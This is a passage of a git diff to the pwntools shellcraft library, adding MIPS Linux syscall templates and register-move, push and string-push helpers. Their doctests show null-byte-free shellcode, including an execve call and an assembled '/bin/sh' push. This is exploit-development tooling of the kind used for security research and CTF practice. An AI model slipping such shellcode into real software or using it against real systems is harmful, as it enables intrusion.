- li $a0, 1 - move $a1, $sp - /* Set a2 = 2 = 0x2 */ - li $a2, #2 - /* Set a3 = 0 = 0x0 */ - xor $a3, $a3, $a3 - /* Set a7 = 11 = 0xb */ - li $v0, 11 - syscall - >>> print shellcraft.mips.linux.syscall('SYS_exit', 0).rstrip() - /* call exit(0) */ - /* Set a0 = 0 = 0x0 */ - xor $a0, $a0, $a0 - /* Set v0 = (SYS_exit) = 0xfa1 */ - move $v0, (SYS_exit) - syscall + >>> print pwnlib.shellcraft.i386.linux.syscall('SYS_execve', 1, 'esp', 2, 0).rstrip() + /* call execve(1, 'esp', 2, 0) */ + push 0x1 + pop ebx + mov ecx, esp + push 0x2 + pop edx + xor esi, esi + push 0xb + pop eax + int 0x80 + >>> print pwnlib.shellcraft.i386.linux.syscall('SYS_execve', 2, 1, 0, 20).rstrip() + /* call execve(2, 1, 0, 20) */ + push 0x2 + pop ebx + push 0x1 + pop ecx + push 0x14 + pop esi + push 0xb + pop eax + cdq /* Set edx to 0, eax is known to be positive */ + int 0x80 + >>> print pwnlib.shellcraft.i386.linux.syscall().rstrip() + /* call syscall() */ + int 0x80 + >>> print pwnlib.shellcraft.i386.linux.syscall('eax', 'ebx', 'ecx').rstrip() + /* call syscall('eax', 'ebx', 'ecx') */ + /* moving ebx into ebx, but this is a no-op */ + /* moving ecx into ecx, but this is a no-op */ + /* moving eax into eax, but this is a no-op */ + int 0x80 + >>> print pwnlib.shellcraft.i386.linux.syscall('ebp', None, None, 1).rstrip() + /* call syscall('ebp', ?, ?, 1) */ + push 0x1 + pop edx + mov eax, ebp + int 0x80 + >>> print pwnlib.shellcraft.i386.linux.syscall( + ... 'SYS_mmap2', 0, 0x1000, + ... 'PROT_READ | PROT_WRITE | PROT_EXEC', + ... 'MAP_PRIVATE | MAP_ANONYMOUS', + ... -1, 0).rstrip() + /* call mmap2(0, 4096, 'PROT_READ | PROT_WRITE | PROT_EXEC', 'MAP_PRIVATE | MAP_ANONYMOUS', -1, 0) */ + xor ebx, ebx + xor ecx, ecx + mov ch, 0x10 + push 0x7 + pop edx + push 0x22 + pop esi + push -1 + pop edi + xor ebp, ebp + xor eax, eax + mov al, 0xc0 + int 0x80 <% - if isinstance(syscall, (str, unicode)) and syscall.startswith('SYS_'): - syscall_repr = syscall[4:] + "(%s)" + append_cdq = False + if isinstance(syscall, (str, unicode, Constant)) and str(syscall).startswith('SYS_'): + syscall_repr = str(syscall)[4:] + "(%s)" args = [] else: syscall_repr = 'syscall(%s)' @@ -48,15 +86,17 @@ Example: if arg == None: args.append('?') else: - args.append(repr(arg)) + args.append(pretty(arg, False)) while args and args[-1] == '?': args.pop() syscall_repr = syscall_repr % ', '.join(args) + + registers = abi.register_arguments + arguments = [syscall, arg0, arg1, arg2, arg3, arg4, arg5] + regctx = dict(zip(registers, arguments)) %>\ /* call ${syscall_repr} */ -% for dst, src in zip(['a0', 'a1', 'a2', 'a3', 'a4', 'a5', 'a6', 'v0'], [arg0, arg1, arg2, arg3, arg4, arg5, arg6, syscall]): - % if src != None: - ${mips.mov(dst, src)} - % endif -% endfor - syscall +%if any(a is not None for a in arguments): + ${mips.setregs(regctx)} +%endif + syscall 0x40404 diff --git a/pwnlib/shellcraft/templates/mips/linux/syslog.asm b/pwnlib/shellcraft/templates/mips/linux/syslog.asm new file mode 100644 index 000000000..f8dbf7c99 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/syslog.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="pri, fmt, vararg"/> +<%docstring> +Invokes the syscall syslog. See 'man 2 syslog' for more information. + +Arguments: + pri(int): pri + fmt(char): fmt + vararg(int): vararg + + + ${syscall('SYS_syslog', pri, fmt, vararg)} diff --git a/pwnlib/shellcraft/templates/mips/linux/tee.asm b/pwnlib/shellcraft/templates/mips/linux/tee.asm new file mode 100644 index 000000000..72ce74b9b --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/tee.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fdin, fdout, len, flags"/> +<%docstring> +Invokes the syscall tee. See 'man 2 tee' for more information. + +Arguments: + fdin(int): fdin + fdout(int): fdout + len(size_t): len + flags(unsigned): flags + + + ${syscall('SYS_tee', fdin, fdout, len, flags)} diff --git a/pwnlib/shellcraft/templates/mips/linux/time.asm b/pwnlib/shellcraft/templates/mips/linux/time.asm new file mode 100644 index 000000000..4a26e4032 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/time.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="timer"/> +<%docstring> +Invokes the syscall time. See 'man 2 time' for more information. + +Arguments: + timer(time_t): timer + + + ${syscall('SYS_time', timer)} diff --git a/pwnlib/shellcraft/templates/mips/linux/timer_create.asm b/pwnlib/shellcraft/templates/mips/linux/timer_create.asm new file mode 100644 index 000000000..c8c271128 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/timer_create.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="clock_id, evp, timerid"/> +<%docstring> +Invokes the syscall timer_create. See 'man 2 timer_create' for more information. + +Arguments: + clock_id(clockid_t): clock_id + evp(sigevent): evp + timerid(timer_t): timerid + + + ${syscall('SYS_timer_create', clock_id, evp, timerid)} diff --git a/pwnlib/shellcraft/templates/mips/linux/timer_delete.asm b/pwnlib/shellcraft/templates/mips/linux/timer_delete.asm new file mode 100644 index 000000000..73ca81b96 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/timer_delete.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="timerid"/> +<%docstring> +Invokes the syscall timer_delete. See 'man 2 timer_delete' for more information. + +Arguments: + timerid(timer_t): timerid + + + ${syscall('SYS_timer_delete', timerid)} diff --git a/pwnlib/shellcraft/templates/mips/linux/timer_getoverrun.asm b/pwnlib/shellcraft/templates/mips/linux/timer_getoverrun.asm new file mode 100644 index 000000000..8920a6603 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/timer_getoverrun.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="timerid"/> +<%docstring> +Invokes the syscall timer_getoverrun. See 'man 2 timer_getoverrun' for more information. + +Arguments: + timerid(timer_t): timerid + + + ${syscall('SYS_timer_getoverrun', timerid)} diff --git a/pwnlib/shellcraft/templates/mips/linux/timer_gettime.asm b/pwnlib/shellcraft/templates/mips/linux/timer_gettime.asm new file mode 100644 index 000000000..b6475f3e6 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/timer_gettime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="timerid, value"/> +<%docstring> +Invokes the syscall timer_gettime. See 'man 2 timer_gettime' for more information. + +Arguments: + timerid(timer_t): timerid + value(itimerspec): value + + + ${syscall('SYS_timer_gettime', timerid, value)} diff --git a/pwnlib/shellcraft/templates/mips/linux/timer_settime.asm b/pwnlib/shellcraft/templates/mips/linux/timer_settime.asm new file mode 100644 index 000000000..bdc6cf39d --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/timer_settime.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="timerid, flags, value, ovalue"/> +<%docstring> +Invokes the syscall timer_settime. See 'man 2 timer_settime' for more information. + +Arguments: + timerid(timer_t): timerid + flags(int): flags + value(itimerspec): value + ovalue(itimerspec): ovalue + + + ${syscall('SYS_timer_settime', timerid, flags, value, ovalue)} diff --git a/pwnlib/shellcraft/templates/mips/linux/truncate.asm b/pwnlib/shellcraft/templates/mips/linux/truncate.asm new file mode 100644 index 000000000..c03b8851e --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/truncate.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="file, length"/> +<%docstring> +Invokes the syscall truncate. See 'man 2 truncate' for more information. + +Arguments: + file(char): file + length(off_t): length + + + ${syscall('SYS_truncate', file, length)} diff --git a/pwnlib/shellcraft/templates/mips/linux/truncate64.asm b/pwnlib/shellcraft/templates/mips/linux/truncate64.asm new file mode 100644 index 000000000..1e488e9d8 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/truncate64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="file, length"/> +<%docstring> +Invokes the syscall truncate64. See 'man 2 truncate64' for more information. + +Arguments: + file(char): file + length(off64_t): length + + + ${syscall('SYS_truncate64', file, length)} diff --git a/pwnlib/shellcraft/templates/mips/linux/ulimit.asm b/pwnlib/shellcraft/templates/mips/linux/ulimit.asm new file mode 100644 index 000000000..b464e9210 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/ulimit.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="cmd, vararg"/> +<%docstring> +Invokes the syscall ulimit. See 'man 2 ulimit' for more information. + +Arguments: + cmd(int): cmd + vararg(int): vararg + + + ${syscall('SYS_ulimit', cmd, vararg)} diff --git a/pwnlib/shellcraft/templates/mips/linux/umask.asm b/pwnlib/shellcraft/templates/mips/linux/umask.asm new file mode 100644 index 000000000..3670efd3d --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/umask.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="mask"/> +<%docstring> +Invokes the syscall umask. See 'man 2 umask' for more information. + +Arguments: + mask(mode_t): mask + + + ${syscall('SYS_umask', mask)} diff --git a/pwnlib/shellcraft/templates/mips/linux/uname.asm b/pwnlib/shellcraft/templates/mips/linux/uname.asm new file mode 100644 index 000000000..242f29df4 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/uname.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall uname. See 'man 2 uname' for more information. + +Arguments: + name(utsname): name + + + ${syscall('SYS_uname', name)} diff --git a/pwnlib/shellcraft/templates/mips/linux/unlink.asm b/pwnlib/shellcraft/templates/mips/linux/unlink.asm new file mode 100644 index 000000000..983b17c52 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/unlink.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall unlink. See 'man 2 unlink' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_unlink', name)} diff --git a/pwnlib/shellcraft/templates/mips/linux/unlinkat.asm b/pwnlib/shellcraft/templates/mips/linux/unlinkat.asm new file mode 100644 index 000000000..1b996d32d --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/unlinkat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, name, flag"/> +<%docstring> +Invokes the syscall unlinkat. See 'man 2 unlinkat' for more information. + +Arguments: + fd(int): fd + name(char): name + flag(int): flag + + + ${syscall('SYS_unlinkat', fd, name, flag)} diff --git a/pwnlib/shellcraft/templates/mips/linux/unshare.asm b/pwnlib/shellcraft/templates/mips/linux/unshare.asm new file mode 100644 index 000000000..48f527e25 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/unshare.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall unshare. See 'man 2 unshare' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_unshare', flags)} diff --git a/pwnlib/shellcraft/templates/mips/linux/ustat.asm b/pwnlib/shellcraft/templates/mips/linux/ustat.asm new file mode 100644 index 000000000..2ab2ec87d --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/ustat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="dev, ubuf"/> +<%docstring> +Invokes the syscall ustat. See 'man 2 ustat' for more information. + +Arguments: + dev(dev_t): dev + ubuf(ustat): ubuf + + + ${syscall('SYS_ustat', dev, ubuf)} diff --git a/pwnlib/shellcraft/templates/mips/linux/utime.asm b/pwnlib/shellcraft/templates/mips/linux/utime.asm new file mode 100644 index 000000000..ea8da3981 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/utime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="file, file_times"/> +<%docstring> +Invokes the syscall utime. See 'man 2 utime' for more information. + +Arguments: + file(char): file + file_times(utimbuf): file_times + + + ${syscall('SYS_utime', file, file_times)} diff --git a/pwnlib/shellcraft/templates/mips/linux/utimensat.asm b/pwnlib/shellcraft/templates/mips/linux/utimensat.asm new file mode 100644 index 000000000..cc2918985 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/utimensat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, path, times, flags"/> +<%docstring> +Invokes the syscall utimensat. See 'man 2 utimensat' for more information. + +Arguments: + fd(int): fd + path(char): path + times(timespec): times + flags(int): flags + + + ${syscall('SYS_utimensat', fd, path, times, flags)} diff --git a/pwnlib/shellcraft/templates/mips/linux/utimes.asm b/pwnlib/shellcraft/templates/mips/linux/utimes.asm new file mode 100644 index 000000000..a7c841d6f --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/utimes.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="file, tvp"/> +<%docstring> +Invokes the syscall utimes. See 'man 2 utimes' for more information. + +Arguments: + file(char): file + tvp(timeval): tvp + + + ${syscall('SYS_utimes', file, tvp)} diff --git a/pwnlib/shellcraft/templates/mips/linux/vfork.asm b/pwnlib/shellcraft/templates/mips/linux/vfork.asm new file mode 100644 index 000000000..c05e5a510 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/vfork.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall vfork. See 'man 2 vfork' for more information. + +Arguments: + + + + ${syscall('SYS_vfork')} diff --git a/pwnlib/shellcraft/templates/mips/linux/vhangup.asm b/pwnlib/shellcraft/templates/mips/linux/vhangup.asm new file mode 100644 index 000000000..49bf1992b --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/vhangup.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall vhangup. See 'man 2 vhangup' for more information. + +Arguments: + + + + ${syscall('SYS_vhangup')} diff --git a/pwnlib/shellcraft/templates/mips/linux/vmsplice.asm b/pwnlib/shellcraft/templates/mips/linux/vmsplice.asm new file mode 100644 index 000000000..e9cc77196 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/vmsplice.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fdout, iov, count, flags"/> +<%docstring> +Invokes the syscall vmsplice. See 'man 2 vmsplice' for more information. + +Arguments: + fdout(int): fdout + iov(iovec): iov + count(size_t): count + flags(unsigned): flags + + + ${syscall('SYS_vmsplice', fdout, iov, count, flags)} diff --git a/pwnlib/shellcraft/templates/mips/linux/wait4.asm b/pwnlib/shellcraft/templates/mips/linux/wait4.asm new file mode 100644 index 000000000..b2d356411 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/wait4.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="pid, stat_loc, options, usage"/> +<%docstring> +Invokes the syscall wait4. See 'man 2 wait4' for more information. + +Arguments: + pid(pid_t): pid + stat_loc(WAIT_STATUS): stat_loc + options(int): options + usage(rusage): usage + + + ${syscall('SYS_wait4', pid, stat_loc, options, usage)} diff --git a/pwnlib/shellcraft/templates/mips/linux/waitid.asm b/pwnlib/shellcraft/templates/mips/linux/waitid.asm new file mode 100644 index 000000000..d2acbf358 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/waitid.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="idtype, id, infop, options"/> +<%docstring> +Invokes the syscall waitid. See 'man 2 waitid' for more information. + +Arguments: + idtype(idtype_t): idtype + id(id_t): id + infop(siginfo_t): infop + options(int): options + + + ${syscall('SYS_waitid', idtype, id, infop, options)} diff --git a/pwnlib/shellcraft/templates/mips/linux/waitpid.asm b/pwnlib/shellcraft/templates/mips/linux/waitpid.asm new file mode 100644 index 000000000..369824d6e --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/waitpid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="pid, stat_loc, options"/> +<%docstring> +Invokes the syscall waitpid. See 'man 2 waitpid' for more information. + +Arguments: + pid(pid_t): pid + stat_loc(int): stat_loc + options(int): options + + + ${syscall('SYS_waitpid', pid, stat_loc, options)} diff --git a/pwnlib/shellcraft/templates/mips/linux/write.asm b/pwnlib/shellcraft/templates/mips/linux/write.asm new file mode 100644 index 000000000..189f8aaa8 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/write.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, buf, n"/> +<%docstring> +Invokes the syscall write. See 'man 2 write' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + + + ${syscall('SYS_write', fd, buf, n)} diff --git a/pwnlib/shellcraft/templates/mips/linux/writev.asm b/pwnlib/shellcraft/templates/mips/linux/writev.asm new file mode 100644 index 000000000..cef625d72 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/writev.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, iovec, count"/> +<%docstring> +Invokes the syscall writev. See 'man 2 writev' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + + + ${syscall('SYS_writev', fd, iovec, count)} diff --git a/pwnlib/shellcraft/templates/mips/mov.asm b/pwnlib/shellcraft/templates/mips/mov.asm index ad8c9d0bc..b8208be88 100644 --- a/pwnlib/shellcraft/templates/mips/mov.asm +++ b/pwnlib/shellcraft/templates/mips/mov.asm @@ -1,50 +1,137 @@ <% - from pwnlib.shellcraft import common - from pwnlib import constants + from pwnlib.util import lists, packing, fiddling, misc + from pwnlib.constants import eval, Constant from pwnlib.context import context as ctx # Ugly hack, mako will not let it be called context from pwnlib.log import getLogger - from pwnlib.shellcraft.registers import mips as regs - from pwnlib.util.fiddling import negate, bnot - log = getLogger('pwnlib.shellcraft.arm.mov') + from pwnlib.shellcraft import mips, registers, pretty, okay + log = getLogger('pwnlib.shellcraft.mips.mov') %> <%page args="dst, src"/> <%docstring> -Move src into dest. +Move src into dst without newlines and null bytes. -Support for automatically avoiding newline and null bytes has to be done. +Register $t8 and $t9 are not guarenteed to be preserved. If src is a string that is not a register, then it will locally set `context.arch` to `'mips'` and use :func:`pwnlib.constants.eval` to evaluate the string. Note that this means that this shellcode can change behavior depending on the value of `context.os`. -Examples: - - >>> print shellcraft.mips.mov('a0','a1').rstrip() - move $a0, $a1 - >>> print shellcraft.mips.mov('a0', 5).rstrip() - /* Set r0 = 5 = 0x5 */ - li $a0, 5 - Args: - dest (str): The destination register. + + dst (str): The destination register. src (str): Either the input register, or an immediate value. + +Example: + + >>> print shellcraft.mips.mov('$t0', 0).rstrip() + slti $t0, $zero, 0xFFFF /* $t0 = 0 */ + >>> print shellcraft.mips.mov('$t2', 0).rstrip() + xor $t2, $t2, $t2 /* $t2 = 0 */ + >>> print shellcraft.mips.mov('$t0', 0xcafebabe).rstrip() + li $t0, 0xcafebabe + >>> print shellcraft.mips.mov('$t2', 0xcafebabe).rstrip() + li $t9, 0xcafebabe + add $t2, $t9, $zero + >>> print shellcraft.mips.mov('$s0', 0xca0000be).rstrip() + li $t9, ~0xca0000be + not $s0, $t9 + >>> print shellcraft.mips.mov('$s0', 0xca0000ff).rstrip() + li $t9, 0x1010101 ^ 0xca0000ff + li $s0, 0x1010101 + xor $s0, $t9, $s0 + >>> print shellcraft.mips.mov('$t9', 0xca0000be).rstrip() + li $t9, ~0xca0000be + not $t9, $t9 + >>> print shellcraft.mips.mov('$t2', 0xca0000be).rstrip() + li $t9, ~0xca0000be + not $t9, $t9 + add $t2, $t9, $0 /* mov $t2, $t9 */ + >>> print shellcraft.mips.mov('$t2', 0xca0000ff).rstrip() + li $t8, 0x1010101 ^ 0xca0000ff + li $t9, 0x1010101 + xor $t9, $t8, $t9 + add $t2, $t9, $0 /* mov $t2, $t9 */ + >>> print shellcraft.mips.mov('$a0', '$t2').rstrip() + add $a0, $t2, $0 /* mov $a0, $t2 */ + >>> print shellcraft.mips.mov('$a0', '$t8').rstrip() + sw $t8, -4($sp) /* mov $a0, $t8 */ + lw $a0, -4($sp) + <% -if not dst in regs: - log.error('%r is not a register' % str(dst)) +if isinstance(src, str) and src.startswith('$') and src not in registers.mips: + log.error("Unknown register %r" % src) + return + +if not dst.startswith('$'): + log.error("Registers must start with $") + return -if not src in regs: - with ctx.local(arch = 'mips'): - src = constants.eval(src) +if isinstance(src, str) and dst.startswith('$') and dst not in registers.mips: + log.error("Unknown register %r" % dst) + return + +if isinstance(src, str) and src not in registers.mips: + src = eval(src) + +src_reg = registers.mips.get(src, None) +dst_reg = registers.mips.get(dst, None) +tmp_reg = '$t9' if dst_reg != registers.mips['$t9'] else '$t8' + +if src_reg == 0: + src = 0 + src_reg = None +%>\ +% if None not in (src_reg, dst_reg): + % if src_reg == dst_reg: +## Nop. + /* mov ${dst}, ${src} is a noop */ + % elif src_reg not in [2, 3, 4, 5, 6, 7, 8, 16, 24]: +## Avoid using a src in the list because it causes NULL byte + add ${dst}, ${src}, $0 /* mov ${dst}, ${src} */ + % else: +## Better than two 'li' instructions due to being two instructions +## fewer. 'li' is actually 'lui' and 'ori' in hiding. + sw ${src}, -4($sp) /* mov ${dst}, ${src} */ + lw ${dst}, -4($sp) + % endif +% elif dst_reg == 10: +## Register $t2/$10 may encodes a newline for 'lui $t2, XXXX' +## so we have to send everything through $t9. + %if okay(src): + li $t9, ${pretty(src)} + add ${dst}, $t9, $zero + % elif src in (0, '$zero', '$0'): + xor ${dst}, ${dst}, ${dst} /* ${dst} = 0 */ + % elif dst == '$t2': + ${mips.mov('$t9', src)} + ${mips.mov(dst, '$t9')} + %endif +% elif isinstance(src, (int, long)): +## Everything else is the general case for moving into registers. +<% + srcp = packing.pack(src, word_size=32) + srcu = packing.unpack(srcp, word_size=32, sign=False) +%> +% if src in (0, '$zero', '$0'): +## XOR sometimes encodes a zero byte, so use SLTI instead + slti ${dst}, $zero, 0xFFFF /* ${dst} = 0 */ +% elif okay(src): +## Nice and easy + li ${dst}, ${pretty(src)} +% elif okay((~srcu) & 0xffffffff): +## Almost nice and easy + li $t9, ~${pretty(src)} + not ${dst}, $t9 +% else: +<% +a,b = fiddling.xor_pair(srcp, avoid = '\x00\n') +a = hex(packing.unpack(a, 32)) +b = hex(packing.unpack(b, 32)) %> -%if not isinstance(src, (int, long)): - move $${dst}, $${src} -%else: - /* Set ${dst} = ${src} = 0x${'%x' % src} */ - %if src == 0: - xor $${dst}, $${dst}, $${dst} - %else: - li $${dst}, ${src} - %endif -%endif + li ${tmp_reg}, ${a} ^ ${pretty(src)} + li ${dst}, ${a} + xor ${dst}, ${tmp_reg}, ${dst} +% endif +% endif diff --git a/pwnlib/shellcraft/templates/mips/nop.asm b/pwnlib/shellcraft/templates/mips/nop.asm new file mode 100644 index 000000000..84c434725 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/nop.asm @@ -0,0 +1,2 @@ +<%docstring>MIPS nop instruction. + add $t9, $t9, $zero /* nop */ diff --git a/pwnlib/shellcraft/templates/mips/push.asm b/pwnlib/shellcraft/templates/mips/push.asm new file mode 100644 index 000000000..b56c65450 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/push.asm @@ -0,0 +1,27 @@ +<% + from pwnlib.util import packing + from pwnlib.shellcraft import mips + from pwnlib import constants + from pwnlib.shellcraft import registers + import re +%> +<%page args="value"/> +<%docstring> +Pushes a value onto the stack. + +<% +value_orig = value +is_reg = value in registers.mips + +if not is_reg and isinstance(value, (str, unicode)): + try: + value = constants.eval(value) + except (ValueError, AttributeError): + pass +%> +% if not is_reg: + ${mips.mov('$t0', value)} + <% value = '$t0' %>\ +%endif + sw ${value}, -4($sp) + addi $sp, $sp, -4 diff --git a/pwnlib/shellcraft/templates/mips/pushstr.asm b/pwnlib/shellcraft/templates/mips/pushstr.asm new file mode 100644 index 000000000..485b1c3ac --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/pushstr.asm @@ -0,0 +1,111 @@ +<% + from pwnlib.util import lists, packing, fiddling + from pwnlib.shellcraft import mips +%>\ +<%page args="string, append_null = True"/> +<%docstring> +Pushes a string onto the stack without using +null bytes or newline characters. + +Example: + + >>> print shellcraft.mips.pushstr('').rstrip() + /* push '\x00' */ + sw $zero, -4($sp) + addiu $sp, $sp, -4 + >>> print shellcraft.mips.pushstr('a').rstrip() + /* push 'a\x00' */ + li $t9, ~0x61 + not $t1, $t9 + sw $t1, -4($sp) + addiu $sp, $sp, -4 + >>> print shellcraft.mips.pushstr('aa').rstrip() + /* push 'aa\x00' */ + li $t9, ~0x6161 + not $t1, $t9 + sw $t1, -4($sp) + addiu $sp, $sp, -4 + >>> print shellcraft.mips.pushstr('aaa').rstrip() + /* push 'aaa\x00' */ + li $t9, ~0x616161 + not $t1, $t9 + sw $t1, -4($sp) + addiu $sp, $sp, -4 + >>> print shellcraft.mips.pushstr('aaaa').rstrip() + /* push 'aaaa\x00' */ + li $t1, 0x61616161 + sw $t1, -8($sp) + sw $zero, -4($sp) + addiu $sp, $sp, -8 + >>> print shellcraft.mips.pushstr('aaaaa').rstrip() + /* push 'aaaaa\x00' */ + li $t1, 0x61616161 + sw $t1, -8($sp) + li $t9, ~0x61 + not $t1, $t9 + sw $t1, -4($sp) + addiu $sp, $sp, -8 + >>> print shellcraft.mips.pushstr('aaaa', append_null = False).rstrip() + /* push 'aaaa' */ + li $t1, 0x61616161 + sw $t1, -4($sp) + addiu $sp, $sp, -4 + >>> print shellcraft.mips.pushstr('\xc3').rstrip() + /* push '\xc3\x00' */ + li $t9, ~0xc3 + not $t1, $t9 + sw $t1, -4($sp) + addiu $sp, $sp, -4 + >>> print shellcraft.mips.pushstr('\xc3', append_null = False).rstrip() + /* push '\xc3' */ + li $t9, ~0xc3 + not $t1, $t9 + sw $t1, -4($sp) + addiu $sp, $sp, -4 + >>> print enhex(asm(shellcraft.mips.pushstr("/bin/sh"))) + 696e093c2f622935f8ffa9af97ff193cd08c393727482003fcffa9aff8ffbd27 + >>> print enhex(asm(shellcraft.mips.pushstr(""))) + fcffa0affcffbd27 + >>> print enhex(asm(shellcraft.mips.pushstr("\x00", False))) + fcffa0affcffbd27 + +Args: + string (str): The string to push. + append_null (bool): Whether to append a single NULL-byte before pushing. + +<% + if append_null: + string += '\x00' + if not string: + return + + def get_offset(nib): + num = 0 + # Ensure we don't overflow our existing nibble + if nib[0] == '\xff': + num = 3 + else: + num = 0x101 + return num + + def pretty(n): + return hex(n & (2 ** 32 - 1)) + + split_string = lists.group(4, string, 'fill', '\x00') + stack_offset = len(split_string) * -4 +%>\ + /* push ${repr(string)} */ +% for index, word in enumerate(split_string): +% if word == '\x00\x00\x00\x00': + sw $zero, ${stack_offset+(4 * index)}($sp) +<% + continue +%>\ +% endif +<% + word = packing.u32(word, sign=True) +%>\ + ${mips.mov('$t1', word)} + sw $t1, ${stack_offset+(4 * index)}($sp) +% endfor + addiu $sp, $sp, ${stack_offset} diff --git a/pwnlib/shellcraft/templates/mips/setregs.asm b/pwnlib/shellcraft/templates/mips/setregs.asm new file mode 100644 index 000000000..057f7c881 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/setregs.asm @@ -0,0 +1,45 @@ +<% + from pwnlib.regsort import regsort + from pwnlib.constants import Constant, eval + from pwnlib.shellcraft import registers + from pwnlib.shellcraft.mips import mov +%> +<%page args="reg_context, stack_allowed = True"/> +<%docstring> +Sets multiple registers, taking any register dependencies into account +(i.e., given eax=1,ebx=eax, set ebx first). + +Args: + reg_context (dict): Desired register context + stack_allowed (bool): Can the stack be used? + +Example: + + >>> print shellcraft.setregs({'$t0':1, '$a3':'0'}).rstrip() + slti $a3, $zero, 0xFFFF /* $a3 = 0 */ + li $t9, ~1 + not $t0, $t9 + >>> print shellcraft.setregs({'$a0':'$a1', '$a1':'$a0', '$a2':'$a1'}).rstrip() + sw $a1, -4($sp) /* mov $a2, $a1 */ + lw $a2, -4($sp) + xor $a1, $a1, $a0 /* xchg $a1, $a0 */ + xor $a0, $a1, $a0 + xor $a1, $a1, $a0 + +<% +reg_context = {k:v for k,v in reg_context.items() if v is not None} +sorted_regs = regsort(reg_context, registers.mips) +%> +% if not sorted_regs: + /* setregs noop */ +% else: +% for how, src, dst in regsort(reg_context, registers.mips): +% if how == 'xchg': + xor ${dst}, ${dst}, ${src} /* xchg ${dst}, ${src} */ + xor ${src}, ${dst}, ${src} + xor ${dst}, ${dst}, ${src} +% else: + ${mov(src, dst)} +% 